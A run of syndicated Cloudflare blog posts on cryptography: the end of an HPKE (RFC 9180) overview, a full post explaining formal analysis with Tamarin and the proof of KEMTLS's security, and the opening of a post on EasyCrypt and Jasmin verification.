When designing protocols and applications that need a simple, reusable, and agile abstraction for public-key encryption, existing standards are not fit for purpose. That’s where HPKE comes into play.

Construction and design goals

HPKE is a public-key encryption construction that is designed from the outset to be simple, reusable, and future-proof. It lets a sender encrypt arbitrary-length messages under a receiver’s public key, as shown below. You can try this out in the browser at Franziskus Kiefer’s blog post on HPKE!

HPKE: Standardizing public-key encryption (finally!)
HPKE overview

HPKE is built in stages. It starts with a Key Encapsulation Mechanism (KEM), which is similar to the key transport protocol described earlier and, in fact, can be constructed from the Diffie-Hellman key agreement protocol. A KEM has two algorithms: Encapsulation and Decapsulation, or Encap and Decap for short. The Encap algorithm creates a symmetric secret and wraps it for a public key such that only the holder of the corresponding private key can unwrap it. An attacker knowing this encapsulated key cannot recover even a single bit of the shared secret. Decap takes the encapsulated key and the private key associated with the public key, and computes the original shared secret. From this shared secret, HPKE computes a series of derived keys that are then used to encrypt and authenticate plaintext messages between sender and receiver.

This simple construction was driven by several high-level design goals and principles. We will discuss these goals and how they were met below.

Algorithm agility

Different applications, protocols, and deployments have different constraints, and locking any single use case into a specific (set of) algorithm(s) would be overly restrictive. For example, some applications may wish to use post-quantum algorithms when available, whereas others may wish to use different authenticated encryption algorithms for symmetric-key encryption. To accomplish this goal, HPKE is designed as a composition of a Key Encapsulation Mechanism (KEM), Key Derivation Function (KDF), and Authenticated Encryption Algorithm (AEAD). Any combination of the three algorithms yields a valid instantiation of HPKE, subject to certain security constraints about the choice of algorithm.

One important point worth noting here is that HPKE is not a protocol, and therefore does nothing to ensure that sender and receiver agree on the HPKE ciphersuite or shared context information. Applications and protocols that use HPKE are responsible for choosing or negotiating a specific HPKE ciphersuite that fits their purpose. This allows applications to be opinionated about their choice of algorithms to simplify implementation and analysis, as is common with protocols like WireGuard, or be flexible enough to support choice and agility, as is the approach taken with TLS.

Authentication modes

At a high level, public-key encryption ensures that only the holder of the private key can decrypt messages encrypted for the corresponding public key (being able to decrypt the message is an implicit authentication of the receiver.) However, there are other ways in which applications may wish to authenticate messages from sender to receiver. For example, if both parties have a pre-shared key, they may wish to ensure that both can demonstrate possession of this pre-shared key as well. It may also be desirable for senders to demonstrate knowledge of their own private key in order for recipients to decrypt the message (this functionally is similar to signing an encryption, but has some subtle and important differences).

To support these various use cases, HPKE admits different modes of authentication, allowing various combinations of pre-shared key and sender private key authentication. The additional private key contributes to the shared secret between the sender and receiver, and the pre-shared key contributes to the derivation of the application data encryption secrets. This process is referred to as the “key schedule”, and a simplified version of it is shown below.

HPKE: Standardizing public-key encryption (finally!)
Simplified HPKE key schedule

These modes come at a price, however: not all KEM algorithms will work with all authentication modes. For example, for most post-quantum KEM algorithms there isn’t a private key authentication variant known.

Reusability

The core of HPKE’s construction is its key schedule. It allows secrets produced and shared with KEMs and pre-shared keys to be mixed together to produce additional shared secrets between sender and receiver for performing authenticated encryption and decryption. HPKE allows applications to build on this key schedule without using the corresponding AEAD functionality, for example, by exporting a shared application-specific secret. Using HPKE in an “export-only” fashion allows applications to use other, non-standard AEAD algorithms for encryption, should that be desired. It also allows applications to use a KEM different from those specified in the standard, as is done in the proposed TLS AuthKEM draft.

Interface simplicity

HPKE hides the complexity of message encryption from callers. Encrypting a message with additional authenticated data from sender to receiver for their public key is as simple as the following two calls:

// Create an HPKE context to send messages to the receiver
encapsulatedKey, senderContext = SetupBaseS(receiverPublicKey, ”shared application info”)

// AEAD encrypt the message using the context
ciphertext = senderContext.Seal(aad, message)

In fact, many implementations are likely to offer a simplified “single-shot” interface that does context creation and message encryption with one function call.

Notice that this interface does not expose anything like nonce (“number used once”) or sequence numbers to the callers. The HPKE context manages nonce and sequence numbers internally, which means the application is responsible for message ordering and delivery. This was an important design decision done to hedge against key and nonce reuse, which can be catastrophic for security.

Consider what would be necessary if HPKE delegated nonce management to the application. The sending application using HPKE would need to communicate the nonce along with each ciphertext value for the receiver to successfully decrypt the message. If this nonce was ever reused, then security of the AEAD may fall apart. Thus, a sending application would necessarily need some way to ensure that nonces were never reused. Moreover, by sending the nonce to the receiver, the application is effectively implementing a message sequencer. The application could just as easily implement and use this sequencer to ensure in-order message delivery and processing. Thus, at the end of the day, exposing the nonce seemed both harmful and, ultimately, redundant.

Wire format

Another hallmark of HPKE is that all messages that do not contain application data are fixed length. This means that serializing and deserializing HPKE messages is trivial and there is no room for application choice. In contrast, some implementations of hybrid PKE deferred choice of wire format details, such as whether to use elliptic curve point compression, to applications. HPKE handles this under the KEM abstraction.

Development process

HPKE is the result of a three-year development cycle between industry practitioners, protocol designers, and academic cryptographers. In particular, HPKE built upon prior art relating to public-key encryption, iterated on a design and specification in a tight specification, implementation, experimentation, and analysis loop, with an ultimate goal towards real world use.

HPKE: Standardizing public-key encryption (finally!)
HPKE development process

This process isn’t new. TLS 1.3 and QUIC famously demonstrated this as an effective way of producing high quality technical specifications that are maximally useful for their consumers.

One particular point worth highlighting in this process is the value of interoperability and analysis. From the very first draft, interop between multiple, independent implementations was a goal. And since then, every revision was carefully checked by multiple library maintainers for soundness and correctness. This helped catch a number of mistakes and improved overall clarity of the technical specification.

From a formal analysis perspective, HPKE brought novel work to the community. Unlike protocol design efforts like those around TLS and QUIC, HPKE was simpler, but still came with plenty of sharp edges. As a new cryptographic construction, analysis was needed to ensure that it was sound and, importantly, to understand its limits. This analysis led to a number of important contributions to the community, including a formal analysis of HPKE, new understanding of the limits of ChaChaPoly1305 in a multi-user security setting, as well as a new CFRG specification documenting limits for AEAD algorithms. For more information about the analysis effort that went into HPKE, check out this companion blog by Benjamin Lipp, an HPKE co-author.

HPKE’s future

While HPKE may be a new standard, it has already seen a tremendous amount of adoption in the industry. As mentioned earlier, it’s an essential part of the TLS Encrypted Client Hello and Oblivious DoH standards, both of which are deployed protocols on the Internet today. Looking ahead, it’s also been integrated as part of the emerging Oblivious HTTP, Message Layer Security, and Privacy Preserving Measurement standards. HPKE’s hallmark is its generic construction that lets it adapt to a wide variety of application requirements. If an application needs public-key encryption with a key-committing AEAD, one can simply instantiate HPKE using a key-committing AEAD.

Moreover, there exists a huge assortment of interoperable implementations built on popular cryptographic libraries, including OpenSSL, BoringSSL, NSS, and CIRCL. There are also formally verified implementations in hacspec and F*; check out this blog post for more details. The complete set of known implementations is tracked here. More implementations will undoubtedly follow in their footsteps.

HPKE is ready for prime time. I look forward to seeing how it simplifies protocol design and development in the future. Welcome, RFC 9180.

Building Confidence in Cryptographic Protocols

Post Syndicated from Thom Wiggers original https://blog.cloudflare.com/post-quantum-formal-analysis/

Building Confidence in Cryptographic Protocols

An introduction to formal analysis and our proof of the security of KEMTLS

Building Confidence in Cryptographic Protocols

Good morning everyone, and welcome to another Post-Quantum–themed blog post! Today we’re going to look at something a little different. Rather than look into the past or future quantum we’re going to look as far back as the ‘80s and ‘90s, to try and get some perspective on how we can determine whether a protocol is or is not secure. Unsurprisingly, this question comes up all the time. Cryptographers like to build fancy new cryptosystems, but just because we, the authors, can’t break our own designs, it doesn’t mean they are secure: it just means we are not smart enough to break them.

One might at this point wonder why in a post-quantum themed blog post we are talking about security proofs. The reason is simple: the new algorithms that claim to be safe against quantum threats need proofs showing that they actually are safe. In this blog post, not only are we going to introduce how we go about proving a protocol is secure, we’re going to introduce the security proofs of KEMTLS, a version of TLS designed to be more secure against quantum computers, and give you a whistle-stop tour of the formal analysis we did of it.

Let’s go back for the moment to not being smart enough to break a cryptosystem. Saying “I tried very hard to break this, and couldn’t” isn’t a very satisfying answer, and so for many years cryptographers (and others) have been trying to find a better one. There are some obvious approaches to building confidence in your cryptosystem, for example you could try all previously known attacks, and see if the system breaks. This approach will probably weed out any simple flaws, but it doesn’t mean that some new attack won’t be found or even that some new twist on an old one won’t be discovered.

Another approach you can take is to offer a large prize to anyone who can break your new system; but to do that not only do you need a big prize that you can afford to give away if you’re wrong, you can’t be sure that everyone would prefer your prize to, for example, selling an attack to cybercriminals, or even to a government.

Simply trying hard, and inducing other people to do so too still felt unsatisfactory, so in the late ‘80s researchers started trying to use mathematical techniques to prove that their protocol was secure. Now, if you aren’t versed in theoretical computer science you might not even have a clear idea of what it even means to “prove” a protocol is secure, let alone how you might go about it, so let’s start at the very beginning.

A proof

First things first: let’s nail down what we mean by a proof. At its most general level, a mathematical proof starts with some assumptions, and by making logical inferences it builds towards a statement. If you can derive your target statement from your initial assumptions then you can be sure that, if your assumptions are right, then your final statement is true.

Euclid’s famous work, The Elements, a standard math textbook for over 2,000 years, is written in this style. Euclid gives five “postulates”, or assumptions, from which he can derive a huge portion of the geometry known in his day. Euclid’s first postulate, that you can draw a straight line between any two points, is never proven, but taken as read. You can take his first postulate, and his third, that you can draw a circle with any center and radius, and use it to prove his first proposition, that you can draw an equilateral triangle given any finite line. For the curious, you can find public-domain translations of Euclid’s work.

Building Confidence in Cryptographic Protocols
Euclid’s method of drawing an equilateral triangle based on the finite line AB, by drawing two circles around points A and B, with the radius AB. The intersection finds point C of the triangle. Original raster file uploader was Mcgill at en.wikibooks SVG: Beao, Public domain, via Wikimedia Commons.

Whilst it’s fairly easy to intuit how such geometry proofs work, it’s not immediately clear how one could prove something as abstract as the security of a cryptographic protocol. Proofs of protocols operate in a similar way. We build a logical argument starting from a set of assumptions. Security proofs, however, can be much, much bigger than anything in The Elements (for example, our proof of the security properties of KEMTLS, which we will talk about later, is nearly 500,000 lines long) and the only reason we are able to do such complex proofs is that we have something of an advantage over Euclid. We have computers. Using a mix of human-guided theorem proving and automated algorithms we can prove incredibly complex things, such as the security of protocols as the one we will discuss.

Now we know that a proof is a set of logical steps built from a set of assumptions, let’s talk a bit about how security proofs work. First, we need to work out how to describe the protocol in terms that we can reason about. Over the years researchers have come up with many ways for describing computer processes mathematically, most famously Alan Turing defined a-machines, which we now know as Turing Machines, which describe a computer program in an algebraic form. A protocol is slightly more complex than a single program. A protocol can be seen as a number of computers running a set of computer programs that interact with each other.

We’re going to use a class of techniques called process algebras to describe the interacting processes of a protocol. At its most basic level, algebra is the art of generalizing a statement by replacing specific values with general symbols. In standard algebra, these specific values are numbers, so for example we can write (cos 37)² + (sin 37)² = 1, which is true, but we can generalize it to (cos θ)² + (sin θ)² = 1, replacing the specific value, 37, with the symbol θ.

Now you might be wondering why it’s useful to replace things with symbols. The answer is it lets us solve entire classes of problems instead of solving each individual instance. When it comes to security protocols, this is especially important. We can’t possibly try every possible set of inputs to a protocol and check nothing weird happens to one of them. In fact, one of the assumptions we’re going to make when we prove KEMTLS secure is that trying every possible value for some inputs is impossible1. By representing the protocol symbolically, we can write a proof that applies to all possible inputs of the protocol.

Let’s go back to algebra. A process algebra is similar to the kind of algebra you might have learnt in high school: we represent a computer program with symbols for the specific values. We also treat functions symbolically. Rather than try and compute what happens when we apply a function f to a value x, we just create a new symbol f(x). An algebra also provides rules for manipulating expressions. For example, in standard algebra we can transform y + 5 = x² - x into y = x² - x - 5. A process algebra is the same: it not only defines a language to describe interacting processes, it also defines rules for how we can manipulate those expressions.

We can use tools, such as the one we use called Tamarin, to help us do this reasoning. Every protocol has its own rules for what transformations are allowed. It is very useful to have a tool, like Tamarin, to which we can tell these rules and allow it to do all the work of symbol manipulation. Tamarin does far, far more than that, though.

A rule, that we tell Tamarin, might look like this:

rule Register_pk:
  [ Fr(~ltkA) ]
--[ GenLtk($A, ~ltkA)]->
  [ !Ltk($A, ~ltkA), !Pk($A, pk(~ltkA)), Out(pk(~ltkA)) ]

This rule is used to represent that a protocol participant has acquired a new public/private key pair. The rule has three parts:

  • The first part lists the preconditions. In this case, there is only one: we take a Fresh value called ~ltkA, the “long-term key of A”. This precondition is always met, because Tamarin always allows us to generate fresh values.
  • The third part lists the postconditions (what we get back when we apply the rule). Rather than operating on an initial statement, as in high-school algebra, Tamarin instead operates on what we call a model of “bag of facts”. Instead of starting with y + 5 = x² - x, we start with an empty “bag”, and from there, apply rules. These rules take facts out of the bag and put new ones in. In this case, we put in:
    • !Ltk($A, ~ltkA) which represents the private portion of the key, ~ltkA, and the name of the participant it was issued to, $A.
    • !Pk($A, pk(~ltkA)), which represents the public portion of the key, pk(~ltkA), and the participant was issued to, $A.
    • Out(pk(~ltkA)), which represents us publishing the public portion of the key, pk(~ltkA) to the network. Tamarin is based on the Dolev-Yao model, which assumes the attacker controls the network. Thus, this fact makes $A’s public key available to the attacker.

We can only apply a rule if the preconditions are met: the facts we need appear in the bag. By having rules for each step of the protocol, we can apply the rules in order and simulate a run of the protocol. But, as I’m sure you’ve noticed, we skipped the second part of the rule. The second part of the rule is where we list what we call actions.

We use actions to record what happened in a protocol run. In our example, we have the action GenLtk($A, ~ltkA). GenLtk means that a new Long-Term Key (LTK) has been Generated. Whenever we trigger the Register_pk rule, we note this with the two parameters:, $A, the party to whom the new key pair belongs; and ~ltkA, the private part of the generated key2.

If we simulate a single run of the protocol, we can record a list of all the actions executed and put them in a list. However, at any point in the protocol, there may be multiple rules that can be triggered. A list only captures a single run of a protocol, but we want to reason about all possible runs of the protocol. We can arrange our rules into a tree: every time we have multiple rules that could be executed, we give each one of them its own branch.

If we could write this entire tree, it would represent every possible run of the protocol. Because every possible run appears in this tree, if we can show that there are no “bad” runs on this tree, we can be sure that the protocol is “secure”. We put “bad” and “secure” in quotation marks here because we still haven’t actually defined what those terms actually mean.

But before we get to that, let’s quickly recap what we have so far. We have:

  • A protocol we want to prove.
  • A definition of protocol, as a number of computers running a set of computer programs that interact with each other.
  • A technique, process algebras, to describe the interacting processes of the protocol: this technique provides us with symbols and rules for manipulating them.
  • A tree that represents every possible run of the protocol.

We can reason about a protocol by looking at properties that our tree gives. As we are interested in cryptographic protocols, we would like to reason about its security. “Security” is a pretty abstract concept and its meaning changes in different contexts. In our case, to prove something is secure, we first have to say what our security goals are. One thing we might want to prove is, for example, that an attacker can never learn the encryption key of a session. We capture this idea with a reachability lemma.

A reachability lemma asks whether there is a path in the tree that leads to a specific state: can we “reach” this state? In this case, we ask: “can we reach a state where the attacker knows the session key?” If the answer is “no”, we are sure that our protocol has that property (an attacker never learns the session key), or at least that that property is true in our protocol model.

So, if we want to prove the security of a cryptographic protocol, we need to:

  1. Define the goals of the security that is being proven.
  2. Describe the protocol as an interacting process of symbols, rules, and expressions.
  3. Build a tree of all the steps the protocol can take.
  4. Check that the trees of protocol runs attain the goals of security we specified.

This process of creating a model of a program and writing rigorous proofs about that model is called “formal analysis”.

Writing formal proofs of protocol correctness has been very effective at finding and fixing all kinds of issues. During the design of TLS 1.3, for example, it uncovered a number of serious security flaws that were eventually fixed prior to standardization. However, something we need to be wary of with formal analysis is being over-reliant on its results. It’s very possible to be so taken with the rigour of the process and of its mathematical proofs, that the result gets overinterpreted. Not only can a mistake exist in a proof, even in a machine-checked one, the proof may not actually prove what you think it does. There are many examples of this: Needham-Schroeder had a proof of security written in the BAN logic, before Lowe found an attack on a case that the BAN logic did not cover.

In fact, the initial specification of the TLS 1.3 proof made the assumption that nobody uses the same certificate for both a client and a server, even though this is not explicitly disallowed in the specification. This gap led to the “Selfie” vulnerability where a client could be tricked into connecting to itself, potentially leading to resource exhaustion attacks.

Formal analysis of protocol designs also tells you nothing about whether a particular implementation correctly implements a protocol. In other blog posts, we will talk about this. Let’s now return to our core topic: the formal analysis of KEMTLS.

Proving KEMTLS’s security

Now that we have the needed notions, let’s get down to the nitty-gritty: we show you how we proved KEMTLS is secure. KEMTLS is a proposal to do authentication in TLS handshakes using key exchange (via key encapsulation mechanisms or KEMs). KEMTLS examines the trade-offs between post-quantum signature schemes and post-quantum key exchange, as we discussed in other blog posts.

The main idea of KEMTLS is the following: instead of using a signature to prove that you have access to the private key that corresponds to the (signing) public key in the certificate presented, we derive a shared secret encapsulated to a (KEM) public key. The party that presented the certificate can only derive (decapsulate) it from the resulting encapsulation (often also called the ciphertext) if they have access to the correct private key; and only then can they read encrypted traffic. A brief overview of how this looks in the “traditional arrows on paper” form is given below.

Building Confidence in Cryptographic Protocols
Brief overview of the core idea of KEMTLS.

We want to show that the KEMTLS handshake is secure, no matter how an adversary might mess with, reorder, or even create new protocol messages. Symbolic analysis tools such as Tamarin or ProVerif are well suited to this task: as said, they allow us to consider every possible combination or manipulation of protocol messages, participants, and key information. We can then write lemmas about the behavior of the protocol.

Why prove it in Tamarin?

There exists a pen-and-paper proof of the KEMTLS handshake. You might ask: why should we still invest the effort of modeling it in a tool like Tamarin?

Pen-and-paper proofs are in theory fairly straightforward. However, they are very hard to get right. We need to carefully express the security properties of the protocol, and it is very easy to let assumptions lead you to write something that your model does not correctly cover. Verifying that a proof has been done correctly is also very difficult and requires almost as much careful attention as writing the proof itself. In fact, several mistakes in definitions of the properties of the model of the original KEMTLS proof were found, after the paper had been accepted and published at a top-tier security conference.

💡 For those familiar with these kinds of game-based proofs, another “war story”: while modeling the ephemeral key exchange, the authors of KEMTLS initially assumed all we needed was an IND-CPA secure KEM. After writing out all the simulations in pseudo code (which is not part of the proof or the paper otherwise!), it turned out that we needed an additional oracle to answer a single decapsulation query, resulting in requiring a weaker variant of IND-CCA security of our KEM (namely, IND-1CCA security). Using an “only” IND-CPA-secure KEM turned out to not be secure!

Part of the problem with pen-and-paper proofs is perhaps the human nature to read between the lines: we quickly figure out what is intended by a certain sentence, even if the intent is not strictly clarified. Computers do not allow that: to everyone’s familiar frustration whenever a computer has not done what you wanted, but just what you told it to do.

A benefit of computer code, though, is that all the effort is in writing the instructions. A carefully constructed model and proof result in an executable program: verifying should be as simple as being able to run it to the end. However, as always we need to:

  1. Be very careful that we have modeled the right thing and,
  2. Note that even the machine prover might have bugs: this second computer-assisted proof is a complement to, and not a replacement of, the pen-and-paper proof.

Another reason why computer proofs are interesting is because they give the ability to construct extensions. The “pre-distributed keys” extension of KEMTLS, for example, has been only proven on paper in isolation. Tamarin allows us to construct that extension in the same space as the main proof, which will help rule out any cross-functional attacks. With this, the complexity of the proof is increased exponentially, but Tamarin allows us to handle that just by using more computer power. Doing the same on paper requires very, very careful consideration.

One final reason we wanted to perform this computer analysis is because whilst the pen-and-paper proof was in the computational model, our computer analysis is in the symbolic model. Computational proofs attain “high resolution” proofs, giving very tight bounds on exactly how secure a protocol is. Symbolic models are “low resolution”: giving a binary yes/no answer on whether a protocol meets the security goals (with the assumption that the underlying cryptographic primitives are secure). This might sound like computational proofs are the best: their downside is that one has to simplify the model in other areas. The computational proof of KEMTLS, for example, does not model TLS message formats, which a symbolic model can.

Modeling KEMTLS in Tamarin

Before we can start making security claims and asking Tamarin to prove them, we first need to explain to Tamarin what KEMTLS is. As we mentioned earlier, Tamarin treats the world as a “bag of facts”. Keys, certificates, identities, and protocol messages are all facts. Tamarin can take those facts and apply rules to them to construct (or deconstruct) new facts. Executing steps in the KEMTLS protocol is, in a very literal sense, just another way to perform such transformations — and if everything is well-designed, the only “honest” way to reach the end state of the protocol.

We need to start by modeling the protocol. We were fortunate to be able to reuse the work of Cremers et al., who contributed their significant modeling talent to the TLS 1.3 standardization effort. They created a very complete model of the TLS 1.3 protocol, which showed that the protocol is generally secure. For more details, see their paper.

We modified the ephemeral key exchange by substituting the Diffie-Hellman operations in TLS 1.3 with the appropriate KEM operations. Similarly, we modified the messages that perform the certificate handling: instead of verifying a signature, we send back a KemEncapsulation message with the ciphertext. Let’s have a look at one of the changed rules. Don’t worry, it looks a bit scary, but we’re going to break it down for you. And also, don’t worry if you do not grasp all the details: we will cover the most necessary bits when they come up again, so you can also just skip to the next section “Modeling the adversary” instead.

rule client_recv_server_cert_emit_kex:
let
  // … snip
  ss = kemss($k, ~saseed)
  ciphertext = kemencaps($k, ss, certpk)
  // NOTE: the TLS model uses M4 preprocessor macros for notation
  // We also made some edits for clarity
in
  [
    State(C2d, tid, $C, $S, PrevClientState),
    In(senc{<'certificate', certpk>}hs_keys),
    !Pk($S, certpk),
    Fr(~saseed)
  ]
  --[
    C2d(tid),
    KemEncap($k, certpk, ss)
  ]->
  [
    State(C3, tid, $C, $S, ClientState),
    Out(senc{<'encaps', ciphertext>}hs_keyc)
  ]

This rule represents the client getting the server’s certificate and encapsulating a fresh key to it. It then sends the encapsulated key back to the server.

Note that the let … in part of the rule is used to assign expressions to variables. The real meat of the rule starts with the preconditions. As we can see, in this rule there are four preconditions that Tamarin needs to already have in its bag for this rule to be triggered:

  • The first precondition is State(C2d, …). This condition tells us that we have some client that has reached the stage C2d, which is what we call this stage in our representation. The remaining variables define the state of that client.
  • The second precondition is an In one. This is how Tamarin denotes messages received from the network. As we mentioned before, we assume that the network is controlled by the attacker. Until we can prove otherwise, we don’t know whether this message was created by the honest server, if it has been manipulated by the attacker, or even forged. The message contents, senc{<'certificate', certpk>}hs_keys, is symmetrically encrypted ( senc{}) under the server’s handshake key (we’ve slightly edited this message for clarity, and removed various other bits to keep this at least somewhat readable, but you can see the whole definition in our model).
  • The third precondition states the public key of the server, !Pk(S, certpk). This condition is preceded by a ! symbol, which means that it’s a permanent fact to be consumed many times. Usually, once a fact is removed from the bag, it is gone; but permanent facts remain. S is the name of the server, and certpk is the KEM public key.
  • The fourth precondition states the fresh random value, ~saseed.

The postconditions of this rule are a little simpler. We have:

  • State(C3, …), which represents that the client (which was at the start of the rule in state C2d) is now in state C3.
  • Out(senc{<'encaps', ciphertext>}hs_keyc), which represents the action of the client sending the encapsulated key to the network, encrypted under the client’s handshake key.

The four actions recorded in this rule are:

  • First, we record that the client with thread id tid reached the state C2d.
  • Second and third, we record that the client was running the protocol with various intermediate values. We use the phrase “running with” to indicate that although the client believes these values to be the correct, it can’t yet be certain that they haven’t been tampered with, so the client hasn’t committed yet to them.
  • Finally, we record the parameters we put into the KEM with the KemEncap action.

We modify and add such rules to the TLS 1.3 model, so we can run KEMTLS instead of TLS 1.3. For a sanity check, we need to make sure that the protocol can actually be executed: a protocol that can not run, can not leak your secrets. We use a reachability lemma to do that:

lemma exists_C2d:
    exists-trace
    "Ex tid #j. C2d(tid)@#j"

This was the first lemma that we asked Tamarin to prove. Because we’ve marked this lemma exists-trace, it does not need to hold in all traces, all runs of the protocol. It just needs one. This lemma asks if there exists a trace ( exists-trace), where there exists ( Ex ) a variable tid and a time #j (times are marked with #) at which action C2d(tid) is recorded. What this captures is that Tamarin could find a branch of the tree where the rule described above was triggered. Thus, we know that our model can be executed, at least as far as C2d.

Modeling the adversary

In the symbolic model, all cryptography is perfect: if the adversary does not have a particular key, they can not perform any deconstructions to, for example, decrypt a message or decapsulate a ciphertext. Although a proof with this default adversary would show the protocol to be secure against, for example, reordering or replaying messages, we want it to be secure against a slightly stronger adversary. Fortunately, we can model this adversary. Let’s see how.

Let’s take an example. We have a rule that honestly generates long-term keys (certificates) for participants:

rule Register_pk:
  [ Fr(~ltkA) ] 
  --[  GenLtk($A, ~ltkA)  ]->
  [ !Ltk($A, ~ltkA), 
    !Pk($A, kempk($k, ~ltkA)), 
    Out(kempk($k, ~ltkA))
  ]

This rule is very similar to the one we saw at the beginning of this blog post, but we’ve tweaked it to generate KEM public keys. It goes as follows: it generates a fresh value, and registers it as the actor $A’s long-term private key symbol !Ltk and $A’s public key symbol !Pk that we use to model our certificate infrastructure. It also sends ( Out ) the public key to the network such that the adversary has access to it.

The adversary can not deconstruct symbols like Ltk without rules to do so. Thus, we provide the adversary with a special Reveal query, that takes the !Ltk fact and reveals the private key:

rule Reveal_Ltk:
   [ !Ltk($A, ~ltkA) ] --[ RevLtk($A) ]-> [ Out(~ltkA) ]

Executing this rule registers the RevLtk($A) action, so that we know that $A’s certificate can no longer be trusted after RevLtk occurred.

Writing security lemmas

KEMTLS, like TLS, is a cryptographic handshake protocol. These protocols have the general goal to generate session keys that we can use to encrypt user’s traffic, preferably as quickly as possible. One thing we might want to prove is that these session keys are secret:

lemma secret_session_keys [/*snip*/]:
  "All tid actor peer kw kr aas #i.
      SessionKey(tid, actor, peer, <aas, 'auth'>, <kw, kr>)@#i &
      not (Ex #r. RevLtk(peer)@#r & #r < #i) &
      not (Ex tid3 esk #r. RevEKemSk(tid3, peer, esk)@#r & #r < #i) &
      not (Ex tid4 esk #r. RevEKemSk(tid4, actor, esk)@#r & #r < #i)
    ==> not Ex #j. K(kr)@#j"

This lemma states that if the actor has completed the protocol and the attacker hasn’t used one of their special actions, then the attacker doesn’t know the actor’s read key, kr. We’ll go through the details of the lemma in a moment, but first let’s address some questions you might have about this proof statement.

The first question that might arise is: “If we are only secure in the case the attacker doesn’t use their special abilities then why bother modeling those abilities?” The answer has two parts:

  1. We do not restrict the attacker from using their abilities: they can compromise every key except the ones used by the participants in this session. If they managed to somehow make a different participant use the same ephemeral key, then this lemma wouldn’t hold, and we would not be able to prove it.
  2. We allow the attacker to compromise keys used in this session after the session has completed. This means that what we are proving is: an attacker who recorded this session in the past and now has access to the long-term keys (by using their shiny new quantum computer, for example) can’t decrypt what happened in the session. This property is also known as forward secrecy.

The second question you might ask is: “Why do we only care about the read key?”. We only care about the read key because this lemma is symmetric, it holds for all actors. When a client and server have established a TLS session, the client’s read key is the server’s write key and vice versa. Because this lemma applies symmetrically to the client and the server, we prove that the attacker doesn’t know either of those keys.

Let’s return now to the syntax of this lemma.

This first line of this lemma is a “For all” statement over seven variables, which means that we are trying to prove that no matter what values these seven variables hold, the rest of the statement is true. These variables are:

  • the thread id tid,
  • a protocol participant, actor,
  • the person they think they’re talking to, peer,
  • the final read and write keys, kr and kw respectively,
  • the actor’s authentication status, aas,
  • and a time #i.

The next line of the lemma is about the SessionKey action. We record the SessionKey action when the client or the server thinks they have completed the protocol.

The next lines are about two attacker abilities: RevLtk, as discussed earlier; and RevEKemSk, which the attacker can use to reveal ephemeral secrets. The K(x) action means that the attacker learns (or rather, Knows) x. We, then, assert that if there does not Exist a RevEKemSk or RevLtk action on one of the keys used in the session, then there also does not exist a time when K(kr) (when the attacker learns the read key). Quod erat demonstrandum. Let’s run the proofs now.

Proving lemmas in Tamarin

Tamarin offers two methods to prove security lemmas: it has an autoprover that can try to find the solution for you, or you can do it manually. Tamarin sometimes has a hard time figuring out what is important for proving a particular security property, and so manual effort is sometimes unavoidable.

The manual prover interface allows you to select what goal Tamarin should pursue step by step. A proof quickly splits into separate branches: in the picture, you see that Tamarin has already been able to prove the branches that are green, leaving us to make a choice for case 1.

Building Confidence in Cryptographic Protocols
Screenshot from the Tamarin user interface, showing a prompt for the next step in a proof. The branches of the proof that are marked green have already been proven.

Sometimes whilst working in the manual interface, you realize that there are certain subgoals that Tamarin is trying to prove while working on a bigger lemma. By writing what we call a helper lemma we can give Tamarin a shortcut of sorts. Rather than trying to solve all the subgoals of one big lemma, we can split the proof into more digestible chunks. Tamarin can then later reuse these helper lemmas when trying to prove bigger lemmas; much like factoring out functions while programming. Sometimes this even allows us to make lemmas auto-provable. Other times we can extract the kinds of decisions we’re making and heuristics we’re manually applying into a separate “oracle” script: a script that interacts with Tamarin’s prover heuristics on our behalf. This can also automate proving tricky lemmas.

Once you realize how much easier certain things are to prove with helper lemmas, you can get a bit carried away. However, you quickly find that Tamarin is being “distracted” by one of the helper lemmas and starts going down long chains of irrelevant reasoning. When this happens, you can hide the helper lemma from the main lemma you’re trying to prove, and sometimes that allows the autoprover to figure out the rest.

Unfortunately, all these strategies require a lot of intuition that is very hard to obtain without spending a lot of time hands-on with Tamarin. Tamarin can sometimes be a bit unclear about what lemmas it’s trying to apply. We had to resort to tricks, like using unique, highly recognizable variable names in lemmas, such that we can reconstruct where a certain goal in the Tamarin interface is coming from.

While doing this work, auto-proving lemmas has been incredibly helpful. Each time you make a tiny change in either a lemma (or any of the lemmas that are reused by it) or in the whole model, you have to re-prove everything. If we needed to put in lots of manual effort each time, this project would be nowhere near done.

This was demonstrated by two bugs we found in one of the core lemmas of the TLS 1.3 model. It turned out that after completing the proof, some refactoring changes were made to the session_key_agreement lemma. These changes seemed innocent, but actually changed the meaning of the lemma, so that it didn’t make sense anymore (the original definition did cover the right security properties, so luckily this doesn’t cause a security problem). Unfortunately, this took a lot of our time to figure out. However, after a huge effort, we’ve done it. We have a proof that KEMTLS achieves its security goals.

Conclusions

Formal methods definitely have a place in the development of security protocols; the development process of TLS 1.3 has really demonstrated this. We think that any proposal for new security protocols should be accompanied by a machine-verified proof of its security properties. Furthermore, because many protocols are currently specified in natural language, formal specification languages should definitely be under consideration. Natural language is inherently ambiguous, and the inevitable differences in interpretation that come from that lead to all kinds of problems.

However, this work cannot be done by academics alone. Many protocols come out of industry who will need to do this for themselves. We would be the first to admit that the usability of these tools for non-experts is not all the way there yet — and industry and academia should collaborate on making these tools more accessible for everyone. We welcome and look forward to these collaborations in the future!

References

* The authors of this blog post were authors on these papers

…..

1Of course, trying every value isn’t technically impossible, it’s just infeasible, so we make the simplifying assumption that it’s impossible, and just say our proof only applies if the attacker can’t just try every value. Other styles of proof that don’t make that assumption are possible, but we’re not going to go into them.
2For simplicity, this representation assumes that the public portion of a key pair can be derived from the private part, which may not be true in practice. Usually this simplification won’t affect the analysis.

Using EasyCrypt and Jasmin for post-quantum verification

Post Syndicated from Sofía Celi original https://blog.cloudflare.com/post-quantum-easycrypt-jasmin/

Using EasyCrypt and Jasmin for post-quantum verification

Using EasyCrypt and Jasmin for post-quantum verification

Cryptographic code is everywhere: it gets run when we connect to the bank, when we send messages to our friends, or when we watch cat videos. But, it is not at all easy to take a cryptographic specification written in a natural language and produce running code from it, and it is even harder to validate both the theoretical assumptions and the correctness of the implementation itself. Mathematical proofs, as we talked about in our previous blog post, and code inspection are simply not enough. Testing and fuzzing can catch common or well-known bugs or mistakes, but might miss rare ones that can, nevertheless, be triggered by an attacker. Static analysis can detect mistakes in the code, but cannot check whether the code behaves as described by the specification in natural-language (for functional correctness). This gap between implementation and validation can have grave consequences in terms of security in the real world, and we need to bridge this chasm.

